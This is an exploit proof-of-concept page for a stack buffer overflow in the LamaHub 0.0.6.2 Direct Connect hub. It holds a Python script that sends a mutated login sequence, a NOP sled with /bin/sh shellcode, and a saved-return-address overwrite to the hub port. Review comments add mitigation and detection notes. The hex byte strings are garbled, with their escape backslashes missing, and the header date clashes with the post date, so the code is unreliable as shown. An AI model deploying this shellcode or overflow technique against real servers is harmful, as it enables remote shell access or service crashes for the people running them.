LamaHub 0.0.6.2 Buffer Overflow
Posted on 10 September 2016
# Exploit Title: LamaHub-0.0.6.2 BufferOverflow
# Date: 09/09/09
# Exploit Author: Pi3rrot
# Vendor Homepage: http://lamahub.sourceforge.net/
# Software Link: http://ovh.dl.sourceforge.net/sourceforge/lamahub/LamaHub-0.0.6.2.tar.gz
# Version: 0.0.6.2
# Tested on: Debian 8 32bits
# This exploit may crash the Lamahub service in many cases.
# If you compile with -fno-stack-protection and -z execstack
# you will be able to execute arbitrary code.
#
# Thanks to the AFL dev' for making the fuzzer who find the crash ;)
# Thanks to gapz for AFL configuration.
#
# pierre@pi3rrot.net
# How it works ?
# Client side:
# exploit_writeEIP.py
# Server side:
# a ./server
# > init () -> OK
# > started on port -> 4111
# > new client -> 127.0.0.1 -> 4
# $ whoami
# pierre
# $
#
# NOTE(review): proof-of-concept record of a stack-based buffer overflow in the
# LamaHub 0.0.6.2 Direct Connect hub, found by fuzzing (AFL) according to the
# header above. The listing is kept verbatim: the hex byte strings appear
# garbled by extraction and the code is Python 2 (print statements), so it does
# not run as shown and is not repaired here.
#
# Risk: the payload is delivered over a single TCP connection to the hub port
# immediately after connect, as part of the client login sequence, so no
# credentials are involved. The author's own note states the outcome is a
# service crash (denial of service) unless the server was built without the
# stack protector and with an executable stack, in which case the header
# transcript shows a shell being obtained.
#
# Mitigation: default compiler/linker hardening (stack protector, non-executable
# stack) reduces this to a crash per the author's note. The two 4-byte values
# "x2ax6ax06x08" and "xd6x26x06x08" below appear to be little-endian addresses
# inside a non-PIE 32-bit server image (0x0806xxxx) and are build-specific;
# a PIE build with ASLR would invalidate them — confirm against the binary.
# Upgrading or patching the hub's input-length handling is the real fix; no
# fixed version is named on this page.
#
# Detection: the bytes sent decode to a pipe-terminated Direct Connect login
# ("$Supports", "$Key", "$ValidateNick", "$MyINFO $ALL", see buf) followed by
# an abnormally long $MyINFO body made of long runs of repeated bytes
# (0x37, 0xb1, 0x2c in buf2). Oversized, non-printable DC protocol messages
# arriving on the hub port (4111 by default here) are the observable signature.
import socket

# Target: the listing assumes the hub is running locally on its default port.
HOST = 'localhost'
PORT = 4111

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

# buf: a fuzzer-mutated Direct Connect client login sequence. Decoded, it
# contains "$Supports", "|$Key", "$ValidateNick", a "$Ven 1,0091" fragment,
# a corrupted "$GetNickList" and the start of "$MyINFO $ALL".
buf = ""
buf += "x24x53x75x70x70x6fx72x74x73x20x55x73"
buf += "x6cx6cx6fx20x49x50x32x20x65x61x72x63"
buf += "x68x20x5ax50x65x30x20x7cx24x4bx65x79"
buf += "x61x7cx24x56x61x6cx69x64x61x74x65x4e"
buf += "x69x63x6bx20x50x69x65x72x72x65x7cx24"
buf += "x56x65x6ex20x31x2cx30x30x39x31x7cx24"
buf += "x47x01x00x4ex3bx63x6bx4cx69x73x74x7c"
buf += "x24x4dx79x49x4ex46x4fx20x24x41x4cx4c"
buf += "x20x50x69x65x72x72x65x20x4ax65"

#NEED padding of 96
# 96 bytes total: 30-byte NOP sled (0x90), a 24-byte payload (it contains the
# strings "/bin" and "//sh"; cf. the "$ whoami" transcript in the header), then
# 42 more NOP bytes. The two print statements below only report this length.
shellcode = "x90" *30
shellcode += "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9x89xcax6ax0bx58xcdx80"
shellcode += "x90"*42
print "Shellcode len: "
print len(shellcode)

# buf2: the overflowing $MyINFO body — a partial "$My..." header followed by
# long runs of 0x37 ('7'), 0xb1 and 0x2c (',') filler that overruns the
# server-side buffer.
buf2 = "x61x3c"
buf2 += "x3cx24x4dx79x80x00x35x24x70x69x24x30"
buf2 += "x24x37x37x37x37x37x37x37x37x37x37x37"
buf2 += "x37xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1"
buf2 += "xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1"
buf2 += "xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1"
buf2 += "xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1"
buf2 += "xb1x2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2c"
buf2 += "x2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2c"
buf2 += "x2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2c"
buf2 += "x2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2c"
buf2 += "x2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2c"
buf2 += "x2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2c"
buf2 += "x2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2c"
buf2 += "x2cx2cx2cx2cx2cx2cx2cx2c"

# Saved-return-address overwrite; the commented-out "AAAA" variant is the
# crash-only form used to confirm control of EIP (author's alternative).
# The value is specific to the author's build — see the review note above.
eip_overwrite = "x2ax6ax06x08"
#eip_overwrite = "AAAA"

# buf3: trailing data, opening with a second build-specific address
# ("xd6x26x06x08") and ending in a newline (x0a).
buf3 = "xd6x26x06x08xb1xb1xb1xb1xb1xb1xb1xb1"
buf3 += "xb1xb1xb1xb1x37x37x30x2cx49x4ex46x4f"
buf3 += "x24xcaxcaxcaxcax20x5ax50x65x30x20x7c"
buf3 += "x24x4bx65x79x61x7cx24x56x20x41x20x30"
buf3 += "x61x7cx24x56x69x63x6bx20x50x69xcaxca"
buf3 += "x0a"

# Send EVIL PACKET !
# Everything is delivered in one write on the freshly opened connection.
s.sendall(buf + shellcode + buf2 + eip_overwrite + buf3)
s.close()